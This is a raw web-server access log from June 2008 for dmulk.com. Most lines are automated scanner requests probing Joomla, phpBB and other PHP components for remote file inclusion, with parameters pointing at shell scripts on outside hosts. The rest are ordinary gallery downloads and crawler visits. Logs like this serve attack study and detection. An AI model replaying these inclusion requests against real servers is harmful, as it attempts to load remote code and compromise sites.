66.230.197.245 - - [11/Jun/2008:13:12:12 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:12:12 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:12:13 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:12:13 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:12:17 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:12:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:12:21 -0700] "GET /logs/access_080501.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:12:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:12:23 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:12:33 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:12:56 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:12:57 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:12:57 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:13:13:14 -0700] "GET /logs/access080312.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:13:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:13:29 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:13:29 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:13:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:13:35 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:13:36 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:13:36 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:13:13:41 -0700] "GET /logs/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:13:43 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:13:43 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:13:44 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:13:13:46 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:13:13:48 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:13:14:06 -0700] "GET /?S=D HTTP/1.0" 200 18257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:13:14:10 -0700] "GET /logs//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:13:14:10 -0700] "GET //start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:14:39 -0700] "GET /logs/access_080106.log/index2.php?x=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [11/Jun/2008:13:14:55 -0700] "GET /logs/access_080429.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.67.202.19 - - [11/Jun/2008:13:15:16 -0700] "GET /logs/access_080328.log/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.19 - - [11/Jun/2008:13:15:17 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.19 - - [11/Jun/2008:13:15:25 -0700] "GET /logs/access_080331.log/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:13:15:33 -0700] "GET /logs/access_080116.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:13:15:33 -0700] "GET //start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:13:15:33 -0700] "GET /logs//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.208.135 - - [11/Jun/2008:13:15:33 -0700] "GET /logs/access_080305.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:13:15:43 -0700] "GET /logs/access_080116.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:13:15:43 -0700] "GET //start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:13:15:44 -0700] "GET /logs//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.176 - - [11/Jun/2008:13:15:44 -0700] "GET /logs/access_080305.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:13:16:03 -0700] "GET /logs/access_071215.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.20 - - [11/Jun/2008:13:16:03 -0700] "GET /logs/access_080116.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.222.17.2 - - [11/Jun/2008:13:16:16 -0700] "GET /logs/access_080101.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://holaas.net78.net/cmd.txt????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:13:16:38 -0700] "GET /minamijewelry/html/images/jewelry/K4t.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:13:16:43 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:13:16:44 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:13:16:44 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:16:49 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:17:19 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:17:51 -0700] "GET /logs/access_080308.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:17:52 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:17:55 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:13:18:21 -0700] "GET /logs//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:13:18:21 -0700] "GET //start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.24.2.220 - - [11/Jun/2008:13:18:51 -0700] "GET /logs/access_080215.log/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:13:18:58 -0700] "GET //source/includes/load_forum.php?mfh_root_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:13:18:58 -0700] "GET /logs//source/includes/load_forum.php?mfh_root_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:13:19:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:13:19:00 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:13:19:35 -0700] "GET /bikes/WeSTOC08/ HTTP/1.0" 200 832 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:19:36 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:19:56 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&925 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:19:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.1" 200 352070 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:02 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&528 HTTP/1.1" 200 19014 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:20:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:20:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0023.jpg HTTP/1.1" 200 503948 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:11 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 200 448957 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0106.jpg HTTP/1.1" 200 331757 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
79.171.18.36 - - [11/Jun/2008:13:20:33 -0700] "GET /logs/access_080429.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0103.jpg HTTP/1.1" 200 432789 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:20:44 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:20:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0060.jpg HTTP/1.1" 200 373725 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
64.237.105.23 - - [11/Jun/2008:13:20:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:13:20:59 -0700] "GET //skin/zero_vote/error.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:02 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0067.jpg HTTP/1.1" 200 301438 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:20 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0096.jpg HTTP/1.1" 200 43464 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:40 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0115.jpg HTTP/1.1" 200 439089 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:21:52 -0700] "GET /logs/access_080101.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:21:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0142.jpg HTTP/1.1" 200 309100 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:22:01 -0700] "GET /logs/access_080305.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:22:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0086.jpg HTTP/1.1" 200 531628 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
74.6.18.247 - - [11/Jun/2008:13:22:09 -0700] "GET /logs/access_071016.log HTTP/1.0" 200 46965 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:22:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:22:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 200 320247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
209.62.118.242 - - [11/Jun/2008:13:22:44 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.62.118.242 - - [11/Jun/2008:13:22:44 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.62.118.242 - - [11/Jun/2008:13:22:45 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.67.202.19 - - [11/Jun/2008:13:22:47 -0700] "GET /rconfig.inc.php?config[root_dir]=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.1" 200 357822 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0026.jpg HTTP/1.1" 200 518960 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:23:32 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:23:32 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0063.jpg HTTP/1.1" 200 443016 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
213.22.193.50 - - [11/Jun/2008:13:23:41 -0700] "GET /logs/access_080116.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:13:23:41 -0700] "GET //start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:13:23:42 -0700] "GET /logs//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:13:23:42 -0700] "GET /logs/access.log//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.22.193.50 - - [11/Jun/2008:13:23:42 -0700] "GET /logs/access_080305.log//start.php?s=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:13:23:43 -0700] "GET //errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [11/Jun/2008:13:23:43 -0700] "GET /logs//errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:54 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0171.jpg HTTP/1.1" 200 345976 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
80.67.20.173 - - [11/Jun/2008:13:23:54 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:13:23:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:23:55 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0012.jpg HTTP/1.1" 200 557735 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
